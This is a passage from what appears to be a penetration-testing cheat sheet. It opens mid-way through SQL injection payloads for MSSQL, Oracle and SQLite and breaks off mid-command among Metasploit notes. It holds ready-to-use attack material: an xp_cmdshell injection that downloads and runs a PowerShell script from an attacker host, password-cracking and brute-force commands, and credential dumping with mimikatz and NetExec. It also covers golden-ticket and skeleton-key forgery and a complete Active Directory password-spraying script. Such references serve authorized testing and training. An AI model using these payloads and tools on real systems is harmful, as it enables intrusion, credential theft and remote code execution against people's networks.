' or 1=1-- ``` ###### Get Version with Time-Based Injection ```shell ' SELECT @@version; WAITFOR DELAY '00:00:10'; — ``` ###### Enable xp_cmdshell ```shell ' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;-- ``` ###### Remote Code Execution (RCE) ```shell ' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" ;-- ``` ##### Orcale SQL ###### Authentication Bypass ```shell ' or 1=1-- ``` ###### Get Number of Columns ```shell ' order by 3-- ``` ###### Get Table Name ```shell ' union select null,table_name,null from all_tables-- ``` ###### Get Column Name ```shell ' union select null,column_name,null from all_tab_columns where table_name='<TABLE>'-- ``` ###### Dump Data ```shell ' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS-- ``` ##### SQLite ###### Extracting Table Names ```shell http://<RHOST>/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- ``` ###### Extracting User Table ```shell http://<RHOST>/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users-- ``` ##### Error-based SQL Injection (SQLi) ```shell <USERNAME>' OR 1=1 -- // ``` Results in: ```shell SELECT * FROM users WHERE user_name= '<USERNAME>' OR 1=1 -- ``` ```shell ' or 1=1 in (select @@version) -- // ' OR 1=1 in (SELECT * FROM users) -- // ' or 1=1 in (SELECT password FROM users) -- // ' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- // ``` ##### UNION-based SQL Injection (SQLi) ###### Manual Injection Steps ```shell $query = "SELECT * FROM customers WHERE name LIKE '".$_POST["search_input"]."%'"; ``` ```shell ' ORDER BY 1-- // ``` ```shell %' UNION SELECT database(), user(), @@version, null, null -- // ``` ```shell ' UNION SELECT null, null, database(), user(), @@version -- // ``` ```shell ' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- // ``` ```shell ' UNION SELECT null, username, password, description, null FROM users -- // ``` ##### Blind SQL Injection (SQLi) ```shell http://<RHOST>/index.php?user=<USERNAME>' AND 1=1 -- // ``` ```shell http://<RHOST>/index.php?user=<USERNAME>' AND IF (1=1, sleep(3),'false') -- // ``` #### SQL Truncation Attack ```shell 'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb' ``` #### sqlite3 ```shell sqlite3 <FILE>.db ``` ```shell sqlite> .tables sqlite> PRAGMA table_info(<TABLE>); sqlite> SELECT * FROM <TABLE>; ``` #### sqsh ```shell sqsh -S <RHOST> -U <USERNAME> sqsh -S '<RHOST>' -U '<USERNAME>' -P '<PASSWORD>' sqsh -S '<RHOST>' -U '.\<USERNAME>' -P '<PASSWORD>' ``` ##### List Files and Folders with xp_dirtree ```shell EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1; ``` ### Password Attacks ## DonPAPI ```shell DonPAPI <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST> DonPAPI -local_auth <USERNAME>@<RHOST> DonPAPI --hashes <LM>:<NT> <DOMAIN>/<USERNAME>@<RHOST> DonPAPI -laps <DOMAIN>/<USERNAME>:<PASSWORD>@<RHOST> ``` #### fcrack ```shell fcrackzip -u -D -p /PATH/TO/WORDLIST/<WORDLIST> <FILE>.zip ``` #### Group Policy Preferences (GPP) ##### gpp-decrypt ```shell python3 gpp-decrypt.py -f Groups.xml python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ``` #### hashcat > https://hashcat.net/hashcat/ > https://hashcat.net/wiki/doku.php?id=hashcat > https://hashcat.net/cap2hashcat/ > https://hashcat.net/wiki/doku.php?id=example_hashes ```shell hashcat -m 0 md5 /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 100 sha-1 /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 1400 sha256 /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 3200 bcrypt /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 900 md4 /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 1000 ntlm /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 1800 sha512 /PATH/TO/WORDLIST/<WORDLIST> hashcat -m 160 hmac-sha1 /PATH/TO/WORDLIST/<WORDLIST> hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3 ``` ```shell hashcat --example-hashes hashcat --help | grep -i "ntlm" ``` ```shell hashcat --identify --user <FILE> ``` ```shell /usr/share/wordlists/fasttrack.txt /usr/share/hashcat/rules/best64.rule ``` ##### Custom Rules > https://hashcat.net/wiki/doku.php?id=rule_based_attack ###### Add a 1 to each Password ```shell echo \$1 > <FILE>.rule ``` ###### Capitalize first character ```shell $1 c ``` ###### Add nothing, a 1 or a ! to an existing Wordlist ```shell : $1 $! ``` ###### Rule for upper case Letter, numerical Value and special Character - $1 > appends a "1" - $2 > appends a "2" - $3 > appends a "3" - c > Capitalize the first character and lower case the rest ```shell $1 c $! $2 c $! $1 $2 $3 c $! ``` ###### Rule Preview ```shell hashcat -r <FILE>.rule --stdout <FILE>.txt ``` ##### Cracking ASPREPRoast Password File ```shell hashcat -m 18200 -a 0 <FILE> <FILE> ``` ##### Cracking Kerberoasting Password File ```shell hashcat -m 13100 --force <FILE> <FILE> ``` ##### Bruteforce based on the Pattern ```shell hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout ``` ##### Generate Password Candidates: Wordlist + Pattern ```shell hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/PATH/TO/WORDLIST/<WORDLIST> ?d?d?d?u?u?u --force --potfile-disable --stdout ``` ##### Generate NetNLTMv2 with internalMonologue and crack with hashcat ```shell InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800 ``` ###### Result ```shell spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000 ``` ##### Crack with hashcat ```shell hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /PATH/TO/WORDLIST/<WORDLIST> --force --potfile-disable ``` ##### Rules > https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule ##### Cracking with OneRuleToRuleThemAll.rule ```shell hashcat -m 3200 hash.txt -r /PATH/TO/FILE.rule ``` #### Hydra ```shell hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL> hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> <PROTOCOL> hydra <RHOST> -C /PATH/TO/WORDLIST/<FILE> ftp ``` ```shell export HYDRA_PROXY=connect://127.0.0.1:8080 unset HYDRA_PROXY ``` ```shell hydra <RHOST> -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error" hydra <RHOST> -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/index.php:username=user&password=^PASS^:Login failed. Invalid" hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE> http-post-form "/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s <RPORT> hydra <RHOST> -l root@localhost -P otrs-cewl.txt http-form-post "/otrs/index.pl:Action=Login&RequestedURL=Action=Admin&User=root@localhost&Password=^PASS^:Login failed" -vV -f hydra <RHOST> -l admin -P /PATH/TO/WORDLIST/<FILE> http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed" ``` #### John ```shell keepass2john <FILE> ssh2john id_rsa > <FILE> zip2john <FILE> > <FILE> john <FILE> --wordlist=/PATH/TO/WORDLIST/<WORDLIST> --format=crypt john <FILE> --rules --wordlist=/PATH/TO/WORDLIST/<WORDLIST john --show <FILE> ``` #### Kerbrute ##### User Enumeration ```shell ./kerbrute userenum -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES> ``` ##### Password Spray ```shell ./kerbrute passwordspray -d <DOMAIN> --dc <DOMAIN> /PATH/TO/FILE/<USERNAMES> <PASSWORD> ``` #### LaZagne ```cmd laZagne.exe all ``` #### mimikatz ##### Common Commands ```cmd token::elevate token::revert vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN> ``` ##### Dump Hashes ```cmd .\mimikatz.exe sekurlsa::minidump /users/admin/Desktop/lsass.DMP sekurlsa::LogonPasswords meterpreter > getprivs meterpreter > creds_all meterpreter > golden_ticket_create ``` ##### Pass the Ticket ```cmd .\mimikatz.exe sekurlsa::tickets /export kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi klist dir \\<RHOST>\admin$ ``` ##### Forging Golden Ticket ```cmd .\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 misc::cmd klist dir \\<RHOST>\admin$ ``` ##### Skeleton Key ```cmd privilege::debug misc::skeleton net use C:\\<RHOST>\admin$ /user:Administrator mimikatz dir \\<RHOST>\c$ /user:<USERNAME> mimikatz ``` #### NetExec ```shell netexec smb <RHOST> -u '' -p '' --shares netexec smb <RHOST> -u '' -p '' --shares -M spider_plus netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o READ_ONLY=false netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true netexec smb <RHOST> -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999 netexec smb <RHOST> -u '' -p '' --share <SHARE> --get-file <FILE> <FILE> netexec smb <RHOST> -u 'guest' -p '' --shares --rid-brute netexec smb <RHOST> -u 'guest' -p '' --shares --rid-brute 100000 netexec smb <RHOST> -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' netexec smb <RHOST> -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\\' '{print $2}' netexec smb <RHOST> -u '<USERNAME>' --use-kcache --users netexec smb <RHOST> -u '<USERNAME>' --use-kcache --sam netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --shares netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --shares <SHARE> --dir netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --shares <SHARE> --dir "FOLDER" netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --sam netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --lsa netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --dpapi netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --local-auth --sam netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --local-auth --lsa netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --local-auth --dpapi netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M enum_av netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M wcc netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M snipped netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M lsassy netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M backup_operator netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M web_delivery -o URL=http://<LHOST>/<FILE> netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M gpp_autologin netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M gpp_password netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M powershell_history netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M coerce_plus -o LISTENER=<LHOST> netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --ntds netexec smb <RHOST> -u '<USERNAME>' -H '<NTLMHASH>' --ntds netexec smb <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --ntds --user <USERNAME> netexec smb <RHOST> -u '<USERNAME>' -H '<NTLMHASH>' --ntds --user <USERNAME> netexec smb <RHOST> -u '<USERNAME>' -H '<HASH>' -x "whoami" netexec smb /PATH/TO/FILE/<FILE> --gen-relay-list <FILE> netexec ldap <RHOST> -u '' -p '' -M -user-desc netexec ldap <RHOST> -u '' -p '' -M get-desc-users netexec ldap <RHOST> -u '' -p '' -M ldap-checker netexec ldap <RHOST> -u '' -p '' -M veeam netexec ldap <RHOST> -u '' -p '' -M maq netexec ldap <RHOST> -u '' -p '' -M adcs netexec ldap <RHOST> -u '' -p '' -M zerologon netexec ldap <RHOST> -u '' -p '' -M petitpotam netexec ldap <RHOST> -u '' -p '' -M nopac netexec ldap <RHOST> -u '' -p '' --use-kcache -M whoami netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --kerberoasting hashes.kerberoasting netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --asreproast hashes.asreproast netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --gmsa netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --gmsa -k netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --gmsa-convert-id <ID> netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --gmsa-decrypt-lsa <ACCOUNT> netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --find-delegation netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' -M get-network -o ALL=true netexec ldap <RHOST> -u '<USERNAME>' -p '<PASSWORD>' --bloodhound -ns <RHOST> -c All netexec ldap <RHOST> -u '<USERNAME>' --use-kcache --bloodhound --dns-tcp --dns-server <RHOST> -c All netexec winrm <NETWORK>/24 -u '<USERNAME>' -p '<PASSWORD>' -d . netexec winrm -u /t -p '<PASSWORD>' -d '<DOMAIN>' <RHOST> netexec winrm <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> netexec winrm <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --ignore-pw-decoding netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --no-bruteforce --continue-on-success netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --shares netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --shares --continue netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --pass-pol netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --lusers netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --sam netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> --wdigest enable netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> -x 'quser' netexec <PROTOCOL> <RHOST> -u /PATH/TO/FILE/<USERNAMES> -p /PATH/TO/WORDLIST/<WORDLIST> -x 'net user Administrator /domain' --exec-method smbexec ``` #### pypykatz ```shell pypykatz lsa minidump lsass.dmp pypykatz registry --sam sam system ``` #### Spray-Passwords ##### Spray-Passwords.ps1 ```powershell <# .SYNOPSIS PoC PowerShell script to demo how to perform password spraying attacks against user accounts in Active Directory (AD), aka low and slow online brute force method. Only use for good and after written approval from AD owner. Requires access to a Windows host on the internal network, which may perform queries against the Primary Domain Controller (PDC). Does not require admin access, neither in AD or on Windows host. Remote Server Administration Tools (RSAT) are not required. Should NOT be considered OPSEC safe since: - a lot of traffic is generated between the host and the Domain Controller(s). - failed logon events will be massive on Domain Controller(s). - badpwdcount will iterate on user account objects in scope. No accounts should be locked out by this script alone, but there are no guarantees. NB! This script does not take Fine-Grained Password Policies (FGPP) into consideration. .DESCRIPTION Perform password spraying attack against user accounts in Active Directory. .PARAMETER Pass Specify a single or multiple passwords to test for each targeted user account. Eg. -Pass 'Password1,Password2'. Do not use together with File or Url." .PARAMETER File Supply a path to a password input file to test multiple passwords for each targeted user account. Do not use together with Pass or Url. .PARAMETER Url Download file from given URL and use as password input file to test multiple passwords for each targeted user account. Do not use together with File or Pass. .PARAMETER Admins Warning: will also target privileged user accounts (admincount=1.)". Default = $false. .EXAMPLE PS C:\> .\Spray-Passwords.ps1 -Pass 'Summer2016' 1. Test the password 'Summer2016' against all active user accounts, except privileged user accounts (admincount=1). .EXAMPLE PS C:\> .\Spray-Passwords.ps1 -Pass 'Summer2016,Password123' -Admins 1. Test the password 'Summer2016' against all active user accounts, including privileged user accounts (admincount=1). .EXAMPLE PS C:\> .\Spray-Passwords.ps1 -File .\passwords.txt -Verbose 1. Test each password in the file 'passwords.txt' against all active user accounts, except privileged user accounts (admincount=1). 2. Output script progress/status information to console. .EXAMPLE PS C:\> .\Spray-Passwords.ps1 -Url 'https://raw.githubusercontent.com/ZilentJack/Get-bADpasswords/master/BadPasswords.txt' -Verbose 1. Download the password file with weak passwords. 2. Test each password against all active user accounts, except privileged user accounts (admincount=1). 3. Output script progress/status information to console. .LINK Get latest version here: https://github.com/ZilentJack/Spray-Passwords .NOTES Authored by : Jakob H. Heidelberg / @JakobHeidelberg / www.improsec.com Together with : CyberKeel / www.cyberkeel.com Date created : 09/05-2016 Last modified : 26/06-2016 Version history: - 1.00: Initial public release, 26/06-2016 Tested on: - WS 2016 TP5 - WS 2012 R2 - Windows 10 Known Issues & possible solutions/workarounds: KI-0001: - Solution: - Change Requests for vNext (not prioritized): CR-0001: Support for Fine-Grained Password Policies (FGPP). CR-0002: Find better way of getting Default Domain Password Policy than "NET ACCOUNTS". Get-ADDefaultDomainPasswordPolicy is not en option as it relies on RSAT. CR-0003: Threated approach to test more user/password combinations simultaneously. CR-0004: Exception or include list based on username, group membership, SID's or the like. CR-0005: Exclude user account that executes the script (password probably already known). Verbose output: Use -Verbose to output script progress/status information to console. #> [CmdletBinding(DefaultParameterSetName='ByPass')] Param ( [Parameter(Mandatory = $true, ParameterSetName = 'ByURL',HelpMessage="Download file from given URL and use as password input file to test multiple passwords for each targeted user account.")] [String] $Url = '', [Parameter(Mandatory = $true, ParameterSetName = 'ByFile',HelpMessage="Supply a path to a password input file to test multiple passwords for each targeted user account.")] [String] $File = '', [Parameter(Mandatory = $true, ParameterSetName = 'ByPass',HelpMessage="Specify a single or multiple passwords to test for each targeted user account. Eg. -Pass 'Password1,Password2'")] [AllowEmptyString()] [String] $Pass = '', [Parameter(Mandatory = $false,HelpMessage="Warning: will also target privileged user accounts (admincount=1.)")] [Switch] $Admins = $false ) # Method to determine if input is numeric or not Function isNumeric ($x) { $x2 = 0 $isNum = [System.Int32]::TryParse($x, [ref]$x2) Return $isNum } # Method to get the lockout threshold - does not take FGPP into acocunt Function Get-threshold { $data = net accounts $threshold = $data[5].Split(":")[1].Trim() If (isNumeric($threshold) ) { Write-Verbose "threshold is a number = $threshold" $threshold = [Int]$threshold } Else { Write-Verbose "Threshold is probably 'Never', setting max to 1000..." $threshold = [Int]1000 } Return $threshold } # Method to get the lockout observation window - does not tage FGPP into account Function Get-Duration { $data = net accounts $duration = [Int]$data[7].Split(":")[1].Trim() Write-Verbose "Lockout duration is = $duration" Return $duration } # Method to retrieve the user objects from the PDC Function Get-UserObjects { # Get domain info for current domain Try {$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()} Catch {Write-Verbose "No domain found, will quit..." ; Exit} # Get the DC with the PDC emulator role $PDC = ($domainObj.PdcRoleOwner).Name # Build the search string from which the users should be found $SearchString = "LDAP://" $SearchString += $PDC + "/" $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))" $SearchString += $DistinguishedName # Create a DirectorySearcher to poll the DC $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) $objDomain = New-Object System.DirectoryServices.DirectoryEntry $Searcher.SearchRoot = $objDomain # Select properties to load, to speed things up a bit $Searcher.PropertiesToLoad.Add("samaccountname") > $Null $Searcher.PropertiesToLoad.Add("badpwdcount") > $Null $Searcher.PropertiesToLoad.Add("badpasswordtime") > $Null # Search only for enabled users that are not locked out - avoid admins unless $admins = $true If ($Admins) {$Searcher.filter="(&(samAccountType=805306368)(!(lockoutTime>=1))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"} Else {$Searcher.filter="(&(samAccountType=805306368)(!(admincount=1))(!(lockoutTime>=1))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"} $Searcher.PageSize = 1000 # Find & return targeted user accounts $userObjs = $Searcher.FindAll() Return $userObjs } # Method to perform auth test with specific username and password Function Perform-Authenticate { Param ([String]$username,[String]$password) # Get current domain with ADSI $CurrentDomain = "LDAP://"+([ADSI]"").DistinguishedName # Try to authenticate Write-Verbose "Trying to authenticate as user '$username' with password '$password'" $dom = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain, $username, $password) $res = $dom.Name # Return true/false If ($res -eq $null) {Return $false} Else {Return $true} } # Validate and parse user supplied url to CSV file of passwords Function Parse-Url { Param ([String]$url) # Download password file from URL $data = (New-Object System.Net.WebClient).DownloadString($url) $data = $data.Split([environment]::NewLine) # Parse passwords file and return results If ($data -eq $null -or $data -eq "") {Return $null} $passwords = $data.Split(",").Trim() Return $passwords } # Validate and parse user supplied CSV file of passwords Function Parse-File { Param ([String]$file) If (Test-Path $file) { $data = Get-Content $file If ($data -eq $null -or $data -eq "") {Return $null} $passwords = $data.Split(",").Trim() Return $passwords } Else {Return $null} } # Main function to perform the actual brute force attack Function BruteForce { Param ([Int]$duration,[Int]$threshold,[String[]]$passwords) #Setup variables $userObj = Get-UserObjects Write-Verbose "Found $(($userObj).count) active & unlocked users..." If ($passwords.Length -gt $threshold) { $time = ($passwords.Length - $threshold) * $duration Write-Host "Total run time is expected to be around $([Math]::Floor($time / 60)) hours and $([Math]::Floor($time % 60)) minutes." } [Boolean[]]$done = @() [Boolean[]]$usersCracked = @() [Int[]]$numTry = @() $results = @() #Initialize arrays For ($i = 0; $i -lt $userObj.Length; $i += 1) { $done += $false $usersCracked += $false $numTry += 0 } # Main while loop which does the actual brute force. Write-Host "Performing brute force - press [q] to stop the process and print results..." -BackgroundColor Yellow -ForegroundColor Black :Main While ($true) { # Get user accounts $userObj = Get-UserObjects # Iterate over every user in AD For ($i = 0; $i -lt $userObj.Length; $i += 1) { # Allow for manual stop of the while loop, while retaining the gathered results If ($Host.UI.RawUI.KeyAvailable -and ("q" -eq $Host.UI.RawUI.ReadKey("IncludeKeyUp,NoEcho").Character)) { Write-Host "Stopping bruteforce now...." -Background DarkRed Break Main } If ($usersCracked[$i] -eq $false) { If ($done[$i] -eq $false) { # Put object values into variables $samaccountnname = $userObj[$i].Properties.samaccountname $badpwdcount = $userObj[$i].Properties.badpwdcount[0] $badpwdtime = $userObj[$i].Properties.badpasswordtime[0] # Not yet reached lockout tries If ($badpwdcount -lt ($threshold - 1)) { # Try the auth with current password $auth = Perform-Authenticate $samaccountnname $passwords[$numTry[$i]] If ($auth -eq $true) { Write-Host "Guessed password for user: '$samaccountnname' = '$($passwords[$numTry[$i]])'" -BackgroundColor DarkGreen $results += $samaccountnname $results += $passwords[$numTry[$i]] $usersCracked[$i] = $true $done[$i] = $true } # Auth try did not work, go to next password in list Else { $numTry[$i] += 1 If ($numTry[$i] -eq $passwords.Length) {$done[$i] = $true} } } # One more tries would result in lockout, unless timer has expired, let's see... Else { $now = Get-Date If ($badpwdtime) { $then = [DateTime]::FromFileTime($badpwdtime) $timediff = ($now - $then).TotalMinutes If ($timediff -gt $duration) { # Since observation window time has passed, another auth try may be performed $auth = Perform-Authenticate $samaccountnname $passwords[$numTry[$i]] If ($auth -eq $true) { Write-Host "Guessed password for user: '$samaccountnname' = '$($passwords[$numTry[$i]])'" -BackgroundColor DarkGreen $results += $samaccountnname $results += $passwords[$numTry[$i]] $usersCracked[$i] = $true $done[$i] = $true } Else { $numTry[$i] += 1 If($numTry[$i] -eq $passwords.Length) {$done[$i] = $true} } } # Time-diff if } Else { # Verbose-log if $badpwdtime in null. Possible "Cannot index into a null array" error. Write-Verbose "- no badpwdtime exception '$samaccountnname':'$badpwdcount':'$badpwdtime'" # Try the auth with current password $auth = Perform-Authenticate $samaccountnname $passwords[$numTry[$i]] If ($auth -eq $true) { Write-Host "Guessed password for user: '$samaccountnname' = '$($passwords[$numTry[$i]])'" -BackgroundColor DarkGreen $results += $samaccountnname $results += $passwords[$numTry[$i]] $usersCracked[$i] = $true $done[$i] = $true } Else { $numTry[$i] += 1 If($numTry[$i] -eq $passwords.Length) {$done[$i] = $true} } } # Badpwdtime-check if } # Badwpdcount-check if } # Done-check if } # User-cracked if } # User loop # Check if the bruteforce is done so the while loop can be terminated $amount = 0 For ($j = 0; $j -lt $done.Length; $j += 1) { If ($done[$j] -eq $true) {$amount += 1} } If ($amount -eq $done.Length) {Break} # Take a nap for a second Start-Sleep -m 1000 } # Main While loop If ($results.Length -gt 0) { Write-Host "Users guessed are:" For($i = 0; $i -lt $results.Length; $i += 2) {Write-Host " '$($results[$i])' with password: '$($results[$i + 1])'"} } Else {Write-Host "No passwords were guessed."} } $passwords = $null If ($Url -ne '') { $passwords = Parse-Url $Url } ElseIf($File -ne '') { $passwords = Parse-File $File } Else { $passwords = $Pass.Split(",").Trim() } If($passwords -eq $null) { Write-Host "Error in password input, please try again." Exit } # Get password policy info $duration = Get-Duration $threshold = Get-threshold If ($Admins) {Write-Host "WARNING: also targeting admin accounts." -BackgroundColor DarkRed} # Call the main function and start the brute force BruteForce $duration $threshold $passwords ``` ##### Usage ```cmd .\Spray-Passwords.ps1 -Pass <PASSWORD> -Admin ``` ### Exploitation Tools #### Metasploit ```shell $ sudo msfdb run // start database $ sudo msfdb init // database initialization $ msfdb --use-defaults delete // delete existing databases $ msfdb --use-defaults init // database initialization $ msfdb status // database status msf6 > workspace // metasploit workspaces msf6 > workspace -a <WORKSPACE> // add a workspace msf6 > workspace -r <WORKSPACE> // rename a workspace msf6 > workspace -d <WORKSPACE> // delete a workspace msf6 > workspace -D // delete all workspaces msf6 > db_nmap <OPTIONS> // execute nmap and add output to database msf6 > hosts // reads hosts from database msf6 > services // reads services from database msf6 > vulns // displaying vulnerabilities msf6 > search // search within metasploit msf6 > set RHOST <RHOST> // set remote host msf6 > set RPORT <RPORT> // set remote port msf6 > run // run exploit msf6 > spool /PATH/TO/FILE // recording screen output msf6 > save // saves current state msf6 > exploit // using module exploit msf6 > payload // using module payload msf6 > auxiliary // using module auxiliary msf6 > encoder // using module encoder msf6 > nop // using module nop msf6 > show sessions // displays all current sessions msf6 > sessions -i 1 // switch to session 1 msf6 > sessions -u <ID> // upgrading shell to meterpreter msf6 > sessions -k <ID> // kill specific session msf6 > sessions -K // kill all sessions msf6 > jobs // showing all current jobs msf6 > show payloads // displaying available payloads msf6 > set VERBOSE true // enable verbose output msf6 > set forceexploit true // exploits the target anyways msf6 > set EXITFUNC thread // reverse shell can exit without exit the program msf6 > set AutoLoadStdapi false // disables autoload of stdapi msf6 > set PrependMigrate true // enables automatic process migration msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe msf6 > use post/PATH/TO/MODULE // use post exploitation module msf6 > use post/linux/gather/hashdump // use hashdump for Linux msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter msf6 > use exploit/windows/http/oracle_event_processing_upload // use a specific module C:\> > Ctrl + z // put active meterpreter shell in background meterpreter > loadstdapi // load stdapi meterpreter > background // put meterpreter in background (same as "bg") meterpreter > shell // get a system shell meterpreter > channel -i <ID> // get back to existing meterpreter shell meterpreter > ps // checking processes meterpreter > migrate 2236 // migrate to a process meterpreter > getuid // get the user id meterpreter > sysinfo // get system information meterpreter > search -f <FILE> // search for a file meterpreter > upload // uploading local files to the target meterpreter > ipconfig // get network configuration meterpreter > load powershell // loads powershell meterpreter > powershell_shell // follow-up command for load powershell meterpreter > powershell_execute // execute command meterpreter > powershell_import // import module meterpreter > powershell_shell // shell meterpreter > powershell_session_remove // remove meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress' // network discovery meterpreter > powershell_execute '1..254 | foreach { 